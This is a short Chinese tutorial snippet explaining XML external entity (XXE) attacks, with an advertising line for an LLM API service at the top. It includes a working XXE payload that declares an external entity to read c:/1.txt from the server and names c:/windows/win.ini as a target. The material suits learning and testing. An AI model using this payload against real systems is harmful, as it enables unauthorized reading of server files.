💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、星火、月之暗面及文生图 广告
XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 ![](https://img.kancloud.cn/82/f7/82f730af17c58bcbf03027e891800a95_605x111.png) ``` Payload: <?xml version='1.0' encoding='UTF-8'?> <!DOCTYPE a [<!ENTITY b SYSTEM 'file:///c:/1.txt'>]> <students> <student> <w>&b;</w> <name>zhangsan</name> <age>20</age> <class><![CDATA[11]]></class> </student> <student> <name>xiaoming</name> <age>16</age> <class><![CDATA[22]]></class> </student> </students> file:///c:/windows/win.ini ```